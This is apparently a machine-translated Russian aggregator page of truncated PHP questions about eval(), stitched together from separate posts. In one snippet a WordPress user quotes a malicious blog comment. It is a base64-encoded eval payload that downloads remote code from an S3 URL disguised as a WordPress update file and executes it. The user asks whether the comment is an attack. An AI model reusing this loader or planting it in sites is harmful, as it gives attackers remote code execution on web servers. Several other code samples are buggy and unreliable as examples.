EDIT: после того, как я прочитал все данные от других пользователей, я решил использовать то, что @chris предложило call_user_func_array () еще одну причину не использовать eval () медленнее, чем call_user_func_array () , но до сих пор никто не смог ее использовать мой путь, если вы найдете способ, отправьте его в ответ или комментарий :). Поэтому […]
Я использую блог WordPress сегодня, я получил такой комментарий. <!– unsafe comment zapped –> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); –><!–/mfunc–> Когда я декодировал этот комментарий, используя декодер, я получил $data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data); Я получаю много комментариев. Может ли кто-нибудь помочь мне решить эту проблему? Это хак или это показывает начало взлома?
Возможные дубликаты: Когда (если вообще когда-либо) не является злом? когда eval evil в php? Поскольку я не нашел другого способа выполнения строки из внешнего файла в качестве кода, я прибегал к использованию eval (). Я не спрашиваю о каком-либо коде, в частности, поскольку примеры из моего сценария использования будут тривиальными – то, что я хочу […]
Я тестирую систему оценки сообщений об ошибках, но я не смог заставить ее работать, чтобы реально оценить систему. Вы видите, что с ним не так? $errors = array(); $name = '9'; $familyname = 'family'; $user = '9user`'; $postdata = array('name' => $name,'familyname' => $familyname,'user' => $user); foreach($postdata as $key => $value) { switch($key) { case […]
У меня есть функция: function selects($sql,$tmpl) { preg_match_all('/{[^}]*}/', $tmpl, $m); foreach($m[0] as $key => $val) { $find[] = $val; $replace[] = '$row[\''.str_replace(array('{','}'),"",$val).'\']'; } eval($replace); while($row = mysql_fetch_array($sql)) { $selects .= str_replace($find, $replace, $tmpl)."\n"; } return $selects; } echo selects($country_sql,'<option value="{id}">{name}</option>'); Он выводит: <option value="$row['id']">$row['name']</option> Он должен выводить: <option value="1">something</option> <option value="2">something</option> … Есть идеи ? […]
Возникли проблемы с eval() . Я вынужден хранить строки в массиве, которые позже будут рассмотрены. Теперь хранить строки в строке не проблема. Но как я могу хранить массив там? Поскольку у меня НЕ будет доступа к переменной, я хочу, чтобы массив был непосредственно сохранен в этой строке. Смотрите этот код: // ———————- // — class […]
Я писал CMS в стиле MVC и использовал класс Template для загрузки различных файлов, необходимых через file_get_contents В конце я делаю eval('?>'.($template).'<?'); Зная, что eval является злым, как я могу альтернативно сбросить эти данные, чтобы PHP действительно отображал код? На данный момент класс Template делает это, когда все загружено. Возможно ли, чтобы класс Template возвращал […]
У меня есть логические выражения, которые мне нужно оценить. После того, как какой-либо шаблон выражения, параметризованный параметрами, эти выражения могут выглядеть так: $expr1 = '1 or 0 and not(0 or 0)'; $expr2 = "'editor' == 'editor' and not(0 = 1) and 10 > 5"; Поэтому мне нужно обрабатывать числа, строковые литералы, а также логические и […]
Можно ли написать функцию PHP в XML? <doThis> doThis(){ bang bang bang! } </doThis> и используйте simplexml_load_file чтобы получить объект с этой функцией? $foo = simplexml_load_file($xmlAbove); $foo->doThis(); //bang bang bang!
Я выполнял php-тестирование, которое использует функцию eval (), но кажется, что eval () не может правильно вызывать пользовательские функции. См. Мой пример: function equals($a,$b){ if ($t == $r){ return true; } else{ throw new Exception("expected:<".$r."> but was:<".$t.">"); } } eval("$test = 1;"); try{ echo eval("equals($test,1);"); } catch (Exception $e) { echo $e->getMessage(); } но то, […]